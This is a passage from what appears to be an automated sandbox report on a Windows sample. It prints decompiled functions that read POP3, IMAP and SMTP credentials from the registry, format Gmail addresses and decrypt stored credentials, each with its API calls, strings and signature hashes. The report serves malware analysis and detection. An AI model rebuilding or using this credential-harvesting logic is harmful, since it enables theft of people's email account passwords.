                                                                                                                                                                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                                                                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                  • API String ID: 604216836-2190619648
                                                                                                                                                                  • Opcode ID: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                                                                                                                                                                  • Instruction ID: 7a8ee4d7bc4178ad58e78f2f27b608862355488638afca077fa6fa925b8dfb39
                                                                                                                                                                  • Opcode Fuzzy Hash: ad9c5c80b0256c337c12dec900ec01b57eb9c2969be2bde46c98a81af137ee1a
                                                                                                                                                                  • Instruction Fuzzy Hash: D8315075A4025DAFCB11EB69CC81ADE7BBCEB59344F0080B6FA04B3141D6349F598F65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408065, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 41%
                                                                                                                                                                  			E00408065(void* __ecx, void* __eflags, struct tagMENUITEMINFOA _a4, struct HMENU__* _a8, intOrPtr _a12, int _a20, intOrPtr _a24, char* _a40, int _a44, char _a52, void _a53) {
				int _v0;
				int _t26;
				char* _t32;
				int _t44;
				signed int _t46;
				signed int _t47;

				_t38 = __ecx;
				_t47 = _t46 & 0xfffffff8;
				E00412360(0x1040, __ecx);
				_t26 = GetMenuItemCount(_a8);
				_t44 = 0;
				_v0 = _t26;
				if(_t26 <= 0) {
					L13:
					return _t26;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a53, 0, 0x1000);
					_t47 = _t47 + 0xc;
					_a40 =  &_a52;
					_a4.cbSize = 0x30;
					_a8 = 0x36;
					_a44 = 0x1000;
					_a20 = 0;
					_a52 = 0;
					_t26 = GetMenuItemInfoA(_a8, _t44, 1,  &_a4);
					if(_t26 == 0) {
						goto L12;
					}
					if(_a52 == 0) {
						L10:
						_t55 = _a24;
						if(_a24 != 0) {
							_push(0);
							_push(_a24);
							_push(_a4.cbSize);
							_t26 = E00408065(_t38, _t55);
							_t47 = _t47 + 0xc;
						}
						goto L12;
					}
					_t32 = strchr( &_a52, 9);
					if(_t32 != 0) {
						 *_t32 = 0;
					}
					_t33 = _a20;
					if(_a24 != 0) {
						if(_a12 == 0) {
							 *0x4181b4 =  *0x4181b4 + 1;
							_t33 =  *0x4181b4 + 0x11558;
							__eflags =  *0x4181b4 + 0x11558;
						} else {
							_t18 = _t44 + 0x11171; // 0x11171
							_t33 = _t18;
						}
					}
					_t26 = E0040802D(_t33,  &_a52);
					_pop(_t38);
					goto L10;
					L12:
					_t44 = _t44 + 1;
				} while (_t44 < _v0);
				goto L13;
			}









                                                                                                                                                                  0x00408065
                                                                                                                                                                  0x00408068
                                                                                                                                                                  0x00408070
                                                                                                                                                                  0x0040807a
                                                                                                                                                                  0x00408082
                                                                                                                                                                  0x00408086
                                                                                                                                                                  0x0040808a
                                                                                                                                                                  0x0040814f
                                                                                                                                                                  0x00408154
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408090
                                                                                                                                                                  0x00408090
                                                                                                                                                                  0x0040809b
                                                                                                                                                                  0x004080a0
                                                                                                                                                                  0x004080a7
                                                                                                                                                                  0x004080b6
                                                                                                                                                                  0x004080be
                                                                                                                                                                  0x004080c6
                                                                                                                                                                  0x004080ce
                                                                                                                                                                  0x004080d2
                                                                                                                                                                  0x004080d6
                                                                                                                                                                  0x004080de
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004080e4
                                                                                                                                                                  0x0040812e
                                                                                                                                                                  0x0040812e
                                                                                                                                                                  0x00408132
                                                                                                                                                                  0x00408134
                                                                                                                                                                  0x00408135
                                                                                                                                                                  0x00408139
                                                                                                                                                                  0x0040813c
                                                                                                                                                                  0x00408141
                                                                                                                                                                  0x00408141
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408132
                                                                                                                                                                  0x004080ed
                                                                                                                                                                  0x004080f6
                                                                                                                                                                  0x004080f8
                                                                                                                                                                  0x004080f8
                                                                                                                                                                  0x004080fe
                                                                                                                                                                  0x00408102
                                                                                                                                                                  0x00408107
                                                                                                                                                                  0x00408111
                                                                                                                                                                  0x0040811c
                                                                                                                                                                  0x0040811c
                                                                                                                                                                  0x00408109
                                                                                                                                                                  0x00408109
                                                                                                                                                                  0x00408109
                                                                                                                                                                  0x00408109
                                                                                                                                                                  0x00408107
                                                                                                                                                                  0x00408127
                                                                                                                                                                  0x0040812d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00408144
                                                                                                                                                                  0x00408144
                                                                                                                                                                  0x00408145
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                  • String ID: 0$6
                                                                                                                                                                  • API String ID: 2300387033-3849865405
                                                                                                                                                                  • Opcode ID: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                  • Instruction ID: 51172b8e10bed5c2f97a320ed5cd446e6bfcd9d4694fda0f565c00a2b2434e31
                                                                                                                                                                  • Opcode Fuzzy Hash: 7ff34ab211d6860bdd45bd88976f81f6822f66e3605e9fe9da3e2852f2fef4ac
                                                                                                                                                                  • Instruction Fuzzy Hash: 7821D171108384AFC710CF65C981A9BB7E8FF88348F04453EF6C4AA280DB79D955CB5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004044E4, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 66%
                                                                                                                                                                  			E004044E4(intOrPtr __ecx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t37;
				void* _t44;
				intOrPtr _t50;
				void* _t56;
				intOrPtr _t58;
				void* _t63;

				_t63 = __fp0;
				_t50 = __ecx;
				_v8 = __ecx;
				E00402197( &_v940);
				_t58 = _a4;
				_v800 =  *((intOrPtr*)(_t50 + 0xd6c));
				_push(_t58 + 0x404);
				_t44 = 0x7f;
				E004060DA(_t44,  &_v796);
				E004060DA(_t44,  &_v408, _t58 + 0x204);
				E004060DA(_t44,  &_v928, _t58 + 4);
				E004060DA(_t44,  &_v668, _t58 + 0x104);
				_t37 = E004060DA(_t44,  &_v280, _t58 + 0x304);
				_t56 = _t58 + 0x504;
				_push("pop3");
				_push(_t56);
				L00412072();
				if(_t37 != 0) {
					_push("imap");
					_push(_t56);
					L00412072();
					if(_t37 != 0) {
						_push("smtp");
						_push(_t56);
						L00412072();
						if(_t37 == 0) {
							_v412 = 4;
						}
					} else {
						_v412 = 2;
					}
				} else {
					_v412 = 1;
				}
				_v24 =  *((intOrPtr*)(_t58 + 0x804));
				_v20 =  *((intOrPtr*)(_t58 + 0x808));
				return E004023C6( &_v940, _t63, _v8 + 0xfffffe38);
			}























                                                                                                                                                                  0x004044e4
                                                                                                                                                                  0x004044f0
                                                                                                                                                                  0x004044f8
                                                                                                                                                                  0x004044fb
                                                                                                                                                                  0x00404506
                                                                                                                                                                  0x00404509
                                                                                                                                                                  0x00404515
                                                                                                                                                                  0x00404518
                                                                                                                                                                  0x0040451f
                                                                                                                                                                  0x00404531
                                                                                                                                                                  0x00404540
                                                                                                                                                                  0x00404552
                                                                                                                                                                  0x00404564
                                                                                                                                                                  0x00404569
                                                                                                                                                                  0x0040456f
                                                                                                                                                                  0x00404574
                                                                                                                                                                  0x00404575
                                                                                                                                                                  0x0040457f
                                                                                                                                                                  0x0040458d
                                                                                                                                                                  0x00404592
                                                                                                                                                                  0x00404593
                                                                                                                                                                  0x0040459c
                                                                                                                                                                  0x004045aa
                                                                                                                                                                  0x004045af
                                                                                                                                                                  0x004045b0
                                                                                                                                                                  0x004045b9
                                                                                                                                                                  0x004045bb
                                                                                                                                                                  0x004045bb
                                                                                                                                                                  0x0040459e
                                                                                                                                                                  0x0040459e
                                                                                                                                                                  0x0040459e
                                                                                                                                                                  0x00404581
                                                                                                                                                                  0x00404581
                                                                                                                                                                  0x00404581
                                                                                                                                                                  0x004045cb
                                                                                                                                                                  0x004045d4
                                                                                                                                                                  0x004045ef

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004060DA: strlen.MSVCRT ref: 004060DF
                                                                                                                                                                    • Part of subcall function 004060DA: memcpy.MSVCRT ref: 004060F4
                                                                                                                                                                  • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 00404575
                                                                                                                                                                  • _stricmp.MSVCRT(?,imap), ref: 00404593
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _stricmp$memcpystrlen
                                                                                                                                                                  • String ID: imap$pop3$smtp
                                                                                                                                                                  • API String ID: 445763297-821077329
                                                                                                                                                                  • Opcode ID: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                  • Instruction ID: 5d3aebf2a9f6afee3de7fcc7c39c9e230d3229a718a14b09e3d1f3abdf4e177e
                                                                                                                                                                  • Opcode Fuzzy Hash: d315b1c60be8e06bf8a74a29e861cd8fd0a859a3471b1e5e64c4e0a482ae2628
                                                                                                                                                                  • Instruction Fuzzy Hash: 842151B3500318AFD711DB61CD42BDAB7F8AF54304F10056BE649B3181DB787B858B95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004036A6, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004036A6(void* __ecx, void* __edi, void* __esi, void* __fp0, intOrPtr _a4) {
				char _v5;
				char _v132;
				char _v404;
				char _v532;
				intOrPtr _v536;
				char _v920;
				intOrPtr _v924;
				char _v1052;
				char _v1064;
				void* __ebx;
				void* _t18;
				char* _t20;
				char* _t39;
				char* _t41;
				void* _t48;
				void* _t59;

				_t59 = __fp0;
				_t48 = __edi;
				if( *((intOrPtr*)(__edi + 0x888)) == 0) {
					return _t18;
				}
				_t39 =  &_v132;
				_t20 = E0040EF77(_t39, __edi + 0x87c, _a4);
				if(_t20 != 0) {
					_v5 = 0;
					_t20 = strchr(_t39, 0x3a);
					_t41 = _t20;
					if(_t41 != 0) {
						 *_t41 = 0;
						E00402197( &_v1064);
						strcpy( &_v404,  &(_t41[1]));
						strcpy( &_v532,  &_v132);
						_v924 = 7;
						_v536 = 3;
						if(strlen( &_v532) + 0xa < 0x7f) {
							sprintf( &_v920, "%s@gmail.com",  &_v532);
						}
						strcpy( &_v1052,  &_v532);
						_t20 = E004023C6( &_v1064, _t59, _t48);
					}
				}
				return _t20;
			}



















                                                                                                                                                                  0x004036a6
                                                                                                                                                                  0x004036a6
                                                                                                                                                                  0x004036b6
                                                                                                                                                                  0x00403788
                                                                                                                                                                  0x00403788
                                                                                                                                                                  0x004036c7
                                                                                                                                                                  0x004036ca
                                                                                                                                                                  0x004036d1
                                                                                                                                                                  0x004036dc
                                                                                                                                                                  0x004036e0
                                                                                                                                                                  0x004036e5
                                                                                                                                                                  0x004036eb
                                                                                                                                                                  0x004036f8
                                                                                                                                                                  0x004036fb
                                                                                                                                                                  0x00403709
                                                                                                                                                                  0x00403719
                                                                                                                                                                  0x00403725
                                                                                                                                                                  0x0040372f
                                                                                                                                                                  0x00403748
                                                                                                                                                                  0x0040375d
                                                                                                                                                                  0x00403762
                                                                                                                                                                  0x00403773
                                                                                                                                                                  0x00403781
                                                                                                                                                                  0x00403781
                                                                                                                                                                  0x004036eb
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                    • Part of subcall function 0040EF77: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                    • Part of subcall function 0040EF77: memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                    • Part of subcall function 0040EF77: CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                  • strchr.MSVCRT ref: 004036E0
                                                                                                                                                                  • strcpy.MSVCRT(?,00000001,?,?,?), ref: 00403709
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403719
                                                                                                                                                                  • strlen.MSVCRT ref: 00403739
                                                                                                                                                                  • sprintf.MSVCRT ref: 0040375D
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00403773
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                  • String ID: %s@gmail.com
                                                                                                                                                                  • API String ID: 2649369358-4097000612
                                                                                                                                                                  • Opcode ID: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                  • Instruction ID: 644cd556ee9d6f83430fbc5f755ed5fad511d56830514e9de795baf2bfcfc341
                                                                                                                                                                  • Opcode Fuzzy Hash: 80ed345e0ff0ee47aaf383b724b244bfbf67af68538c23d64fe4f8ff209c4e8a
                                                                                                                                                                  • Instruction Fuzzy Hash: 8B21DEF280411D5EDB21DB54CD85FDA77ACBB14308F0401AFF609E2181EAB89BC48B69
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040687C, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040687C(char* __ebx, intOrPtr _a4, int _a8) {
				char _v8;
				void _v1031;
				void _v1032;
				void* _t26;
				char* _t27;
				int _t32;
				int _t38;
				char* _t43;
				int _t44;
				void* _t45;
				void** _t48;
				void* _t50;
				void* _t51;

				_t43 = __ebx;
				_t44 = 0;
				_v1032 = 0;
				memset( &_v1031, 0, 0x3ff);
				_t26 = _a8;
				_t51 = _t50 + 0xc;
				 *__ebx = 0;
				if(_t26 > 0) {
					_t48 = _a4 + 4;
					_v8 = _t26;
					do {
						sprintf( &_v1032, "%s (%s)",  *((intOrPtr*)(_t48 - 4)),  *_t48);
						_t32 = strlen( &_v1032);
						_a8 = _t32;
						memcpy(_t44 + __ebx,  &_v1032, _t32 + 1);
						_t45 = _t44 + _a8 + 1;
						_t38 = strlen( *_t48);
						_a8 = _t38;
						memcpy(_t45 + __ebx,  *_t48, _t38 + 1);
						_t51 = _t51 + 0x30;
						_t48 =  &(_t48[2]);
						_t18 =  &_v8;
						 *_t18 = _v8 - 1;
						_t44 = _t45 + _a8 + 1;
					} while ( *_t18 != 0);
				}
				_t27 = _t44 + _t43;
				 *_t27 = 0;
				 *((char*)(_t27 + 1)) = 0;
				return _t43;
			}
















                                                                                                                                                                  0x0040687c
                                                                                                                                                                  0x0040688b
                                                                                                                                                                  0x00406895
                                                                                                                                                                  0x0040689c
                                                                                                                                                                  0x004068a1
                                                                                                                                                                  0x004068a4
                                                                                                                                                                  0x004068a9
                                                                                                                                                                  0x004068ac
                                                                                                                                                                  0x004068b2
                                                                                                                                                                  0x004068b5
                                                                                                                                                                  0x004068b8
                                                                                                                                                                  0x004068c9
                                                                                                                                                                  0x004068d5
                                                                                                                                                                  0x004068da
                                                                                                                                                                  0x004068ea
                                                                                                                                                                  0x004068f4
                                                                                                                                                                  0x004068f8
                                                                                                                                                                  0x004068fd
                                                                                                                                                                  0x00406908
                                                                                                                                                                  0x00406910
                                                                                                                                                                  0x00406913
                                                                                                                                                                  0x00406916
                                                                                                                                                                  0x00406916
                                                                                                                                                                  0x00406919
                                                                                                                                                                  0x00406919
                                                                                                                                                                  0x0040691f
                                                                                                                                                                  0x00406920
                                                                                                                                                                  0x00406923
                                                                                                                                                                  0x00406926
                                                                                                                                                                  0x0040692e

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                  • String ID: %s (%s)
                                                                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                                                                  • Opcode ID: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                  • Instruction ID: 724a4194cae70d0bf31fff2aa5a30eca349b7c3c60a55174e1cb3006c7faee74
                                                                                                                                                                  • Opcode Fuzzy Hash: 930878db99837ba46a6e987faf5d20af4a34b58a77fcbe6d93f567b97a470ebe
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F1190B2800159AFDB21DF58CD44BDABBACEF45308F00856AFB48EB102D275EA55CB94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EF77, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 25%
                                                                                                                                                                  			E0040EF77(void* __ebx, int _a4, void* _a8) {
				char _v20;
				char _v36;
				char _v52;
				void* _t15;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				int _t32;

				_t28 = __ebx;
				_t31 = __imp__UuidFromStringA;
				_t15 =  *_t31("5e7e8100-9138-11d1-945a-00c04fc308ff",  &_v36);
				_t17 =  *_t31("00000000-0000-0000-0000-000000000000",  &_v20);
				if(_t15 != 0 || _t17 != 0 || E0040EF3B( &_v52, _a4,  &_v36,  &_v20, _a8,  &_a4,  &_a8) != 0) {
					return 0;
				} else {
					_t32 = _a4;
					if(_t32 > 0x7e) {
						_t32 = 0x7e;
					}
					memcpy(_t28, _a8, _t32);
					 *((char*)(_t28 + _t32)) = 0;
					__imp__CoTaskMemFree(_a8);
					return 1;
				}
			}











                                                                                                                                                                  0x0040ef77
                                                                                                                                                                  0x0040ef7e
                                                                                                                                                                  0x0040ef8e
                                                                                                                                                                  0x0040ef9b
                                                                                                                                                                  0x0040ef9f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040efc7
                                                                                                                                                                  0x0040efc7
                                                                                                                                                                  0x0040efcd
                                                                                                                                                                  0x0040efd1
                                                                                                                                                                  0x0040efd1
                                                                                                                                                                  0x0040efd7
                                                                                                                                                                  0x0040efe2
                                                                                                                                                                  0x0040efe6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040efee

                                                                                                                                                                  APIs
                                                                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040EF8E
                                                                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040EF9B
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040EFD7
                                                                                                                                                                  • CoTaskMemFree.OLE32(?,?), ref: 0040EFE6
                                                                                                                                                                  Strings
                                                                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 0040EF96
                                                                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040EF89
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                  • API String ID: 1640410171-3316789007
                                                                                                                                                                  • Opcode ID: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                  • Instruction ID: e50974e3e7746184743268e00a497f96c507105008b10ce8b40323224852ed78
                                                                                                                                                                  • Opcode Fuzzy Hash: 54a3c10d71348b38328debb2075fb86de4f8d1c0c91b0897777fae0c62ad26f4
                                                                                                                                                                  • Instruction Fuzzy Hash: A501807691012EBACF11AAA5CD40EEF7BACEF48354F004437FD15E7141E634EA548BA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409F9C, Relevance: 10.5, APIs: 7, Instructions: 43windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409F9C(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                                  0x00409fa2

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A190
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A1AA
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                  • LoadIconA.USER32 ref: 00409FE7
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040A005
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3673709545-0
                                                                                                                                                                  • Opcode ID: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                  • Instruction ID: 4e57101e09f8a627107abf71349708af879b5e1eab1c783dad4143a9e5363d44
                                                                                                                                                                  • Opcode Fuzzy Hash: 5df2c262a5b4ee5b15d680e4827c5e350c8ab2ef2ec60dcd30680ed78b5bc19f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3101EC71280704BFFA316B60DE4BFD67AA6EB48B05F004425F359690E1C7F56D51DB18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00409F9D, Relevance: 10.5, APIs: 7, Instructions: 42windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409F9D(void* __eax, void* __ecx, intOrPtr* __edi) {

				 *__edi =  *__edi + __ecx;
			}



                                                                                                                                                                  0x00409fa2

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A190
                                                                                                                                                                    • Part of subcall function 0040A175: SendMessageA.USER32 ref: 0040A1AA
                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409FC1
                                                                                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409FD0
                                                                                                                                                                  • LoadIconA.USER32 ref: 00409FE7
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409FF8
                                                                                                                                                                  • LoadIconA.USER32 ref: 0040A005
                                                                                                                                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 0040A010
                                                                                                                                                                  • SendMessageA.USER32 ref: 0040A025
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3673709545-0
                                                                                                                                                                  • Opcode ID: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                  • Instruction ID: 4681c035099bb4a28d1464aa710f9ac1d1cdfab18a2ba86be57a79ad66400e71
                                                                                                                                                                  • Opcode Fuzzy Hash: 93f7bf16144be3831d8fe0abe45ae6939580c4d2b0c37b8b20f1dfc57d53bec6
                                                                                                                                                                  • Instruction Fuzzy Hash: 33018C71280304BFFA226B60EE47FD57BA2AB48B01F008465F348AD0F2CBF129509B08
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407E74, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E00407E74(void* __eflags, struct HWND__* _a4) {
				void _v4103;
				char _v4104;
				void* _t8;
				void* _t17;

				_t8 = E00412360(0x1004, _t17);
				_t21 =  *0x4181b8;
				if( *0x4181b8 != 0) {
					_v4104 = 0;
					memset( &_v4103, 0, 0x1000);
					sprintf(0x4182c0, "dialog_%d",  *0x418300);
					if(E00407F4F(_t17, _t21, "caption",  &_v4104) != 0) {
						SetWindowTextA(_a4,  &_v4104);
					}
					return EnumChildWindows(_a4, E00407E17, 0);
				}
				return _t8;
			}







                                                                                                                                                                  0x00407e7c
                                                                                                                                                                  0x00407e81
                                                                                                                                                                  0x00407e88
                                                                                                                                                                  0x00407e98
                                                                                                                                                                  0x00407e9f
                                                                                                                                                                  0x00407eb4
                                                                                                                                                                  0x00407ecf
                                                                                                                                                                  0x00407edb
                                                                                                                                                                  0x00407edb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407eeb
                                                                                                                                                                  0x00407ef2

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 00407E9F
                                                                                                                                                                  • sprintf.MSVCRT ref: 00407EB4
                                                                                                                                                                    • Part of subcall function 00407F4F: memset.MSVCRT ref: 00407F73
                                                                                                                                                                    • Part of subcall function 00407F4F: GetPrivateProfileStringA.KERNEL32(004182C0,0000000A,0041344F,?,00001000,004181B8), ref: 00407F95
                                                                                                                                                                    • Part of subcall function 00407F4F: strcpy.MSVCRT(?,?), ref: 00407FAF
                                                                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00407EDB
                                                                                                                                                                  • EnumChildWindows.USER32 ref: 00407EEB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
